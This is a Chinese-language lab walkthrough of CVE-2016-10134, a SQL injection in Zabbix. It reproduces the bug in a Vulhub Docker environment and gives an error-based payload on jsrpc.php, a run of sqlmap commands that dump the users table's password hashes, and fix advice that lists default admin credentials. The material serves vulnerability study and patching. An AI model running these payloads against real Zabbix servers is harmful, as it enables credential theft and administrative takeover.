漏洞简述
Zabbix部分版本源代码的latest.php中toggle_ids[]与jsrpc.php中的profieldx2参数存在sql注入,攻击者可通过sql注入获取管理员账户密码,进行增、删、改、查等高危操作。
受影响版本
Zabbix 2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3
漏洞环境搭建
知识扩展
Zabbix 是一种网络监视和管理系统,采用Server-Client架构,提供了实时监控、报警机制、性能统计和数据可视化等广泛功能,通过监视各种网络参数保证服务器系统的安全运营,提供灵活的通知机制以让系统管理员快速定位和解决存在的各种问题。
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
1.克隆 VulHub 仓库到本地
git clone https://bgithub.xyz/vulhub/vulhub.git
2. 进入到vulhub的目录
cd vulhub
3.启动漏洞环境
cd zabbix
cd CVE-2016-10134
docker-compose up -d
4.访问靶机8080端口,环境搭建完毕。
漏洞验证
1.打开Zabbix登录页,不进行登录,输入以下payload:
http://192.168.23.128:8080//jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
出现报错信息,说明本漏洞存在可进行进一步攻击,并显示出了默认用户的用户名
2.使用sqlmap,确认存在注入
python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*"
3.输入以下payload成功获取当前数据库。
python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E --dbs
4.爆zabbix数据库下的表。
python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E -D zabbix --tables
5.爆users表下的列名。
python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E -D zabbix -T users --columns
6.爆userid,name,passwd字段的值。
python sqlmap.py -u "http://192.168.23.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*" --dbms=mysql -p "profileIdx2" --technique E -D zabbix -T users -C userid,name,passwd --dump
7.md5解密一下。
修复建议
1.升级Zabbix至最新版本;
2.禁用 Guest 账户;
修复步骤:
用管理员身份登入zabbix系统,账号密码为:admin/zabbix
在Administration的User groups页面中禁用 Guests 账户。
原文始发于微信公众号(海狼风暴团队):CVE-2016-10134 Zabbix SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论